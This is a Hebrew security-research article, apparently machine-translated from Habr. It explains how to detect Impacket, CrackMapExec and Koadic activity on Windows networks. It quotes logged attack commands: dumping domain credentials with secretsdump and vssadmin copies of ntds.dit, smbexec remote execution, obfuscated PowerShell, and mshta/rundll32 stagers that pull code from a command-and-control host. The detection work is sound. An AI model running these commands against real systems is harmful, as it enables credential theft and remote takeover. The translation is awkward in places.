כיצד לזהות התקפות על תשתית Windows: לימוד כלי האקרים

מספר התקיפות במגזר הארגוני גדל מדי שנה: למשל בשנת 2017 נרשמו 13% יותר אירועים ייחודיים מאשר בשנת 2016, ובסוף 2018 - 27% יותר תקריותמאשר בתקופה הקודמת. כולל אלה שבהם כלי העבודה העיקרי הוא מערכת ההפעלה Windows. בשנים 2017-2018, ה-APT Dragonfly, APT28, APT MuddyWater ביצע התקפות על ארגונים ממשלתיים וצבאיים באירופה, צפון אמריקה וערב הסעודית. והשתמשנו בשלושה כלים בשביל זה - Impacket, CrackMapExec и קואדיק. קוד המקור שלהם פתוח וזמין ב-GitHub.

ראוי לציין שכלים אלו אינם משמשים לחדירה ראשונית, אלא לפיתוח התקפה בתוך התשתית. התוקפים משתמשים בהם בשלבים שונים של ההתקפה בעקבות חדירת ההיקף. את זה, אגב, קשה לזהות ולרוב רק בעזרת טכנולוגיה זיהוי עקבות של פשרה בתעבורת רשת או כלים שמאפשרים לזהות פעולות פעילות של תוקף לאחר שחדר לתשתית. הכלים מספקים מגוון פונקציות, מהעברת קבצים ועד לאינטראקציה עם הרישום וביצוע פקודות במחשב מרוחק. ערכנו מחקר של כלים אלה כדי לקבוע את פעילות הרשת שלהם.

מה שהיינו צריכים לעשות:

• הבן כיצד פועלים כלי פריצה. גלה מה התוקפים צריכים לנצל ובאילו טכנולוגיות הם יכולים להשתמש.
• מצא את מה שלא מזוהה על ידי כלי אבטחת מידע בשלבים הראשונים של התקפה. ניתן לדלג על שלב הסיור, בין אם בגלל שהתוקף הוא תוקף פנימי, או בגלל שהתוקף מנצל חור בתשתית שלא היה ידוע קודם לכן. זה הופך להיות אפשרי לשחזר את כל שרשרת פעולותיו, ומכאן הרצון לזהות תנועה נוספת.
• הסר תוצאות חיוביות כוזבות מכלי זיהוי חדירה. אסור לשכוח שכאשר פעולות מסוימות מתגלות על בסיס סיור בלבד, תיתכן טעויות תכופות. בדרך כלל בתשתית יש מספר מספיק של דרכים, שלא ניתן להבחין מהלגיטימיות במבט ראשון, להשיג מידע כלשהו.

מה הכלים האלה נותנים לתוקפים? אם זה Impacket, אז התוקפים מקבלים ספרייה גדולה של מודולים שניתן להשתמש בהם בשלבים שונים של ההתקפה שיבואו לאחר פריצת ההיקף. כלים רבים משתמשים במודולי Impacket באופן פנימי - לדוגמה, Metasploit. יש לו dcomexec ו-wmiexec לביצוע פקודות מרחוק, secretsdump לקבלת חשבונות מהזיכרון שמתווספים מ-Impacket. כתוצאה מכך, זיהוי נכון של פעילות ספרייה כזו יבטיח זיהוי של נגזרות.

זה לא מקרי שהיוצרים כתבו את "Powered by Impacket" על CrackMapExec (או פשוט CME). בנוסף, ל-CME יש פונקציונליות מוכנה עבור תרחישים פופולריים: Mimikatz להשגת סיסמאות או הגיבובים שלהן, הטמעת Meterpreter או סוכן Empire לביצוע מרחוק, ו-Bloodhound על הסיפון.

הכלי השלישי שבחרנו היה Koadic. הוא די עדכני, הוא הוצג בכנס האקרים הבינלאומי DEFCON 25 בשנת 2017 והוא נבדל בגישה לא סטנדרטית: הוא פועל באמצעות HTTP, Java Script ו-Microsoft Visual Basic Script (VBS). גישה זו נקראת לחיות מחוץ לאדמה: הכלי משתמש בסט של תלות וספריות המובנות ב-Windows. היוצרים קוראים לזה COM Command & Control, או C3.

IMPACKET

הפונקציונליות של Impacket רחבה מאוד, החל מסיור בתוך AD ואיסוף נתונים משרתי MS SQL פנימיים, ועד לטכניקות להשגת אישורים: זוהי מתקפת ממסר SMB, והשגת הקובץ ntds.dit המכיל גיבוב של סיסמאות משתמש מבקר תחום. Impacket גם מבצעת פקודות מרחוק באמצעות ארבע שיטות שונות: WMI, Windows Scheduler Management Service, DCOM ו-SMB, ודורש אישורים לשם כך.

Secretsdump

בואו נסתכל על secretsdump. זהו מודול שיכול לכוון גם למכונות משתמש וגם לבקרי תחום. ניתן להשתמש בו כדי להשיג עותקים של אזורי זיכרון LSA, SAM, SECURITY, NTDS.dit, כך שניתן לראות אותו בשלבים שונים של ההתקפה. השלב הראשון בפעולת המודול הוא אימות באמצעות SMB, המצריך את הסיסמה של המשתמש או ה-hash שלו כדי לבצע אוטומטית את מתקפת Pass the Hash. לאחר מכן מגיעה בקשה לפתוח גישה ל-Service Control Manager (SCM) ולקבל גישה לרישום באמצעות פרוטוקול winreg, באמצעותו יכול תוקף לגלות את הנתונים של ענפי עניין ולקבל תוצאות באמצעות SMB.

באיור. 1 אנו רואים כיצד בדיוק בעת שימוש בפרוטוקול winreg, הגישה מתקבלת באמצעות מפתח רישום עם LSA. לשם כך, השתמש בפקודה DCERPC עם opcode 15 - OpenKey.

אורז. 1. פתיחת מפתח רישום באמצעות פרוטוקול winreg

לאחר מכן, כאשר מתקבלת גישה למפתח, הערכים נשמרים עם הפקודה SaveKey עם opcode 20. Impacket עושה זאת בצורה מאוד ספציפית. זה שומר את הערכים לקובץ ששמו הוא מחרוזת של 8 תווים אקראיים המצורפים ל-.tmp. בנוסף, העלאה נוספת של קובץ זה מתרחשת באמצעות SMB מספריית System32 (איור 2).

אורז. 2. תוכנית לקבלת מפתח רישום ממחשב מרוחק

מסתבר שניתן לזהות פעילות כזו ברשת על ידי שאילתות לסניפי רישום מסוימים באמצעות פרוטוקול winreg, שמות ספציפיים, פקודות וסדרם.

מודול זה גם משאיר עקבות ביומן האירועים של Windows, מה שמקל על זיהויו. למשל, כתוצאה מביצוע הפקודה

secretsdump.py -debug -system SYSTEM -sam SAM -ntds NTDS -security SECURITY -bootkey BOOTKEY -outputfile 1.txt -use-vss -exec-method mmcexec -user-status -dc-ip 192.168.202.100 -target-ip 192.168.202.100 contoso/Administrator:@DC

ביומן Windows Server 2016 נראה את רצף האירועים המפתח הבא:

1. 4624 - כניסה מרחוק.
2. 5145 - בדיקת זכויות גישה לשירות מרחוק winreg.
3. 5145 - בדיקת זכויות גישה לקבצים בספריית System32. לקובץ יש את השם האקראי שהוזכר לעיל.
4. 4688 - יצירת תהליך cmd.exe שמפעיל את vssadmin:

“C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin list shadows ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - יצירת תהליך עם הפקודה:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin create shadow /For=C: ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

6. 4688 - יצירת תהליך עם הפקודה:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy3WindowsNTDSntds.dit %SYSTEMROOT%TemprmumAfcn.tmp ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

7. 4688 - יצירת תהליך עם הפקודה:

"C:windowssystem32cmd.exe" /Q /c echo c:windowssystem32cmd.exe /C vssadmin delete shadows /For=C: /Quiet ^> %SYSTEMROOT%Temp__output > %TEMP%execute.bat & c:windowssystem32cmd.exe /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

Smbexec

כמו כלים רבים לאחר ניצול, ל-Impacket יש מודולים לביצוע פקודות מרחוק. נתמקד ב-smbexec, המספקת מעטפת פקודה אינטראקטיבית במחשב מרוחק. מודול זה דורש גם אימות באמצעות SMB, או עם סיסמה או hash של סיסמה. באיור. באיור 3 אנו רואים דוגמה לאופן שבו פועל כלי כזה, במקרה זה מדובר במסוף המנהל המקומי.

אורז. 3. קונסולת smbexec אינטראקטיבית

השלב הראשון של smbexec לאחר האימות הוא פתיחת ה-SCM עם הפקודה OpenSCManagerW (15). השאילתה בולטת: השדה MachineName הוא DUMMY.

אורז. 4. בקש לפתוח את מנהל בקרת השירות

לאחר מכן, השירות נוצר באמצעות הפקודה CreateServiceW (12). במקרה של smbexec, אנו יכולים לראות את אותו היגיון בניית פקודה בכל פעם. באיור. 5 ירוק מציין פרמטרי פקודה בלתי ניתנים לשינוי, צהוב מציין מה התוקף יכול לשנות. קל לראות שניתן לשנות את השם של קובץ ההפעלה, הספרייה שלו וקובץ הפלט, אבל את השאר הרבה יותר קשה לשנות מבלי להפריע להיגיון של מודול ה-Impacket.

אורז. 5. בקש ליצור שירות באמצעות Service Control Manager

Smbexec גם משאיר עקבות ברורים ביומן האירועים של Windows. ביומן Windows Server 2016 עבור מעטפת הפקודה האינטראקטיבית עם הפקודה ipconfig, נראה את רצף האירועים המפתח הבא:

1. 4697 - התקנת השירות במכשיר של הקורבן:

%COMSPEC% /Q /c echo cd ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

2. 4688 - יצירת תהליך cmd.exe עם הארגומנטים מנקודה 1.
3. 5145 - בדיקת זכויות גישה לקובץ __output בספריית C$.
4. 4697 - התקנת השירות במכונה של הנפגע.

%COMSPEC% /Q /c echo ipconfig ^> 127.0.0.1C$__output 2^>^&1 > %TEMP%execute.bat & %COMSPEC% /Q /c %TEMP%execute.bat & del %TEMP%execute.bat

5. 4688 - יצירת תהליך cmd.exe עם הארגומנטים מנקודה 4.
6. 5145 - בדיקת זכויות גישה לקובץ __output בספריית C$.

Impacket הוא הבסיס לפיתוח כלי תקיפה. הוא תומך כמעט בכל הפרוטוקולים בתשתית Windows ובו בזמן יש לו תכונות אופייניות משלו. הנה בקשות ספציפיות של Winreg, והשימוש ב- SCM API עם יצירת פקודות אופיינית, ופורמט שם הקובץ, ושיתוף SMB SYSTEM32.

CRACKMAPEXEC

כלי ה-CME נועד בעיקר לבצע אוטומציה של פעולות שגרתיות שתוקף צריך לבצע כדי להתקדם בתוך הרשת. זה מאפשר לך לעבוד בשיתוף עם סוכן האימפריה הידוע ומטרפרטר. כדי לבצע פקודות באופן סמוי, CME יכול לטשטש אותן. באמצעות Bloodhound (כלי סיור נפרד), תוקף יכול להפוך את החיפוש לאוטומטי של הפעלת מנהל דומיין פעילה.

כֶּלֶב גִשׁוּשׁ

Bloodhound, ככלי עצמאי, מאפשר סיור מתקדם בתוך הרשת. הוא אוסף נתונים על משתמשים, מכונות, קבוצות, הפעלות ומסופק כסקריפט PowerShell או קובץ בינארי. פרוטוקולים מבוססי LDAP או SMB משמשים לאיסוף מידע. מודול האינטגרציה CME מאפשר הורדה של Bloodhound למחשב של הקורבן, להריץ ולקבל את הנתונים שנאספו לאחר הביצוע, ובכך להפוך פעולות במערכת לאוטומטיות ולהפוך אותן לפחות בולטות. הקליפה הגרפית של Bloodhound מציגה את הנתונים שנאספו בצורה של גרפים, המאפשרים לך למצוא את הדרך הקצרה ביותר מהמחשב של התוקף למנהל הדומיין.

אורז. 6. ממשק Bloodhound

כדי לרוץ על המחשב של הקורבן, המודול יוצר משימה באמצעות ATSVC ו-SMB. ATSVC הוא ממשק לעבודה עם מתזמן המשימות של Windows. CME משתמש בפונקציית NetrJobAdd(1) שלה כדי ליצור משימות דרך הרשת. דוגמה למה שמודול CME שולח מוצגת באיור. 7: זוהי קריאת פקודה cmd.exe וקוד מעורפל בצורה של ארגומנטים בפורמט XML.

איור.7. יצירת משימה באמצעות CME

לאחר שהמשימה הוגשה לביצוע, המכונה של הקורבן מפעילה את Bloodhound בעצמה, וניתן לראות זאת בתנועה. המודול מאופיין בשאילתות LDAP להשגת קבוצות סטנדרטיות, רשימה של כל המכונות והמשתמשים בדומיין, וקבלת מידע על הפעלות משתמש פעילות באמצעות בקשת SRVSVC NetSessEnum.

אורז. 8. השגת רשימה של הפעלות פעילות באמצעות SMB

בנוסף, השקת Bloodhound במכונה של קורבן עם אודיטינג מופעלת מלווה באירוע עם מזהה 4688 (יצירת תהליך) ושם התהליך «C:WindowsSystem32cmd.exe». מה שבולט בו הם הטיעונים של שורת הפקודה:

cmd.exe /Q /c powershell.exe -exec bypass -noni -nop -w 1 -C " & ( $eNV:cOmSPEc[4,26,25]-JOiN'')( [chAR[]](91 , 78, 101,116 , 46, 83 , 101 , … , 40,41 )-jOIN'' ) "

Enum_avproducts

מודול enum_avproducts מעניין מאוד מנקודת מבט של פונקציונליות ויישום. WMI מאפשר לך להשתמש בשפת השאילתה WQL כדי לאחזר נתונים מאובייקטים שונים של Windows, וזה בעצם מה שמודול CME זה משתמש בו. הוא מייצר שאילתות למחלקות AntiSpywareProduct ו- AntiМirusProduct לגבי כלי ההגנה המותקנים במחשב של הקורבן. על מנת להשיג את הנתונים הדרושים, המודול מתחבר למרחב השמות rootSecurityCenter2, ואז יוצר שאילתת WQL ומקבל תגובה. באיור. איור 9 מציג את התוכן של בקשות ותגובות כאלה. בדוגמה שלנו, Windows Defender נמצא.

אורז. 9. פעילות רשת של מודול enum_avproducts

לעתים קרובות, ביקורת WMI (Trace WMI-Activity), שבאירועים שלה תוכל למצוא מידע שימושי על שאילתות WQL, עשויה להיות מושבתת. אבל אם זה מופעל, אז אם הסקריפט enum_avproducts מופעל, יישמר אירוע עם מזהה 11. הוא יכיל את שם המשתמש ששלח את הבקשה ואת השם במרחב השמות rootSecurityCenter2.

לכל אחד ממודולי ה-CME היו חפצים משלו, בין אם זה שאילתות WQL ספציפיות או יצירה של סוג מסוים של מטלות במתזמן משימות עם ערפול ופעילות ספציפית ל-Bloodhound ב-LDAP ו-SMB.

KOADIC

מאפיין ייחודי של Koadic הוא השימוש במפרשי JavaScript ו-VBScript המובנים ב-Windows. במובן זה, הוא עוקב אחר מגמת החיים מחוץ לאדמה - כלומר, אין לו תלות חיצונית ומשתמש בכלי Windows סטנדרטיים. זהו כלי לשליטה ובקרה מלאה (CnC), שכן לאחר ההדבקה מותקן "שתל" על המכונה, המאפשר לשלוט בה. מכונה כזו, בטרמינולוגיה קואדית, נקראת "זומבי". אם אין מספיק הרשאות לתפעול מלא בצד של הקורבן, ל-Koadic יש את היכולת להעלות אותן באמצעות טכניקות מעקף של בקרת משתמש (UAC bypass).

אורז. 10. Koadic Shell

על הנפגע ליזום תקשורת עם שרת הפיקוד והבקרה. כדי לעשות זאת, היא צריכה ליצור קשר עם URI שהוכן קודם ולקבל את הגוף Koadic הראשי באמצעות אחד מהסטייג'רים. באיור. איור 11 מציג דוגמה ל-mshta stager.

אורז. 11. אתחול הפעלה עם שרת CnC

בהתבסס על משתנה התגובה WS, מתברר שהביצוע מתרחש דרך WScript.Shell, והמשתנים STAGER, SESSIONKEY, JOBKEY, JOBKEYPATH, EXPIRE מכילים מידע מפתח על הפרמטרים של ההפעלה הנוכחית. זהו צמד הבקשה-תגובה הראשון בחיבור HTTP עם שרת CnC. בקשות עוקבות קשורות ישירות לפונקציונליות של המודולים הנקראים (שתלים). כל המודולים של Koadic עובדים רק עם הפעלה פעילה עם CnC.

מימיקץ

בדיוק כמו ש-CME עובד עם Bloodhound, Koadic עובד עם Mimikatz כתוכנית נפרדת ויש לה מספר דרכים להשיק אותה. להלן צמד בקשה-תגובה להורדת שתל Mimikatz.

אורז. 12. העבר את מימיקץ לקואדיץ'

אתה יכול לראות כיצד השתנה פורמט URI בבקשה. כעת הוא מכיל ערך עבור המשתנה csrf, שאחראי למודול שנבחר. אל תשים לב לשמה; כולנו יודעים ש-CSRF מובן בדרך כלל אחרת. התגובה הייתה אותו גוף עיקרי של Koadic, שאליו נוסף קוד הקשור למימיקץ. הוא די גדול, אז בואו נסתכל על נקודות המפתח. כאן יש לנו את ספריית Mimikatz מקודדת ב-base64, מחלקה NET מסודרת שתחדיר אותה, וטיעונים להפעלת Mimikatz. תוצאת הביצוע מועברת ברשת בטקסט ברור.

אורז. 13. תוצאה של הפעלת Mimikatz על מכונה מרוחקת

Exec_cmd

ל-Koadic יש גם מודולים שיכולים לבצע פקודות מרחוק. כאן נראה את אותה שיטת יצירת URI ואת משתני ה-sid וה-csrf המוכרים. במקרה של מודול exec_cmd, נוסף קוד לגוף המסוגל לבצע פקודות מעטפת. להלן מוצג קוד כזה הכלול בתגובת HTTP של שרת CnC.

אורז. 14. קוד השתלה exec_cmd

המשתנה GAWTUUGCFI עם תכונת WS המוכרת נדרש לביצוע קוד. בעזרתו, השתל קורא למעטפת, ומעבד שני ענפי קוד - shell.exec עם החזרת זרם הנתונים הפלט ו-shell.run מבלי לחזור.

Koadic אינו כלי טיפוסי, אך יש לו חפצים משלו שבאמצעותם ניתן למצוא אותו בתנועה לגיטימית:

• היווצרות מיוחדת של בקשות HTTP,
• באמצעות winHttpRequests API,
• יצירת אובייקט WScript.Shell באמצעות ActiveXObject,
• גוף גדול לביצוע.

החיבור הראשוני מתבצע על ידי ה-stageer, כך שניתן לזהות את פעילותו דרך אירועי Windows. עבור mshta, זהו אירוע 4688, המציין יצירת תהליך עם תכונת ההתחלה:

C:Windowssystem32mshta.exe http://192.168.211.1:9999/dXpT6

בזמן ש-Koadic פועל, אתה יכול לראות אירועים אחרים של 4688 עם תכונות המאפיינות אותו בצורה מושלמת:

rundll32.exe http://192.168.241.1:9999/dXpT6?sid=1dbef04007a64fba83edb3f3928c9c6c; csrf=;......mshtml,RunHTMLApplication
rundll32.exe http://192.168.202.136:9999/dXpT6?sid=12e0bbf6e9e5405690e5ede8ed651100;csrf=18f93a28e0874f0d8d475d154bed1983;......mshtml,RunHTMLApplication
"C:Windowssystem32cmd.exe" /q /c chcp 437 & net session 1> C:Usersuser02AppDataLocalTemp6dc91b53-ddef-2357-4457-04a3c333db06.txt 2>&1
"C:Windowssystem32cmd.exe" /q /c chcp 437 & ipconfig 1> C:Usersuser02AppDataLocalTemp721d2d0a-890f-9549-96bd-875a495689b7.txt 2>&1

ממצאים

טרנד החיים מהקרקע צובר פופולריות בקרב פושעים. הם משתמשים בכלים ובמנגנונים המובנים ב-Windows לצרכיהם. אנו רואים כלים פופולריים Koadic, CrackMapExec ו-Impacket העוקבים אחר עיקרון זה מופיעים יותר ויותר בדוחות APT. גם מספר המזלגים ב-GitHub עבור הכלים הללו הולך וגדל, וצצים חדשים (כבר יש כאלף כאלה עכשיו). הטרנד צובר פופולריות בשל הפשטות שלו: התוקפים אינם זקוקים לכלי צד שלישי; הם כבר נמצאים על המחשבים של הקורבנות ועוזרים להם לעקוף אמצעי אבטחה. אנו מתמקדים בלימוד תקשורת רשת: כל כלי שתואר לעיל משאיר עקבות משלו בתעבורת הרשת; מחקר מפורט שלהם אפשר לנו ללמד את המוצר שלנו גילוי התקפות רשת PT לזהות אותם, מה שעוזר בסופו של דבר לחקור את כל שרשרת אירועי הסייבר המעורבים בהם.

מחברים:

• אנטון טיורין, ראש מחלקת שירותי מומחים, מרכז אבטחת מומחה PT, טכנולוגיות חיוביות
• אגור פודמוקוב, מומחה, מרכז אבטחת מומחה PT, טכנולוגיות חיוביות

מקור: www.habr.com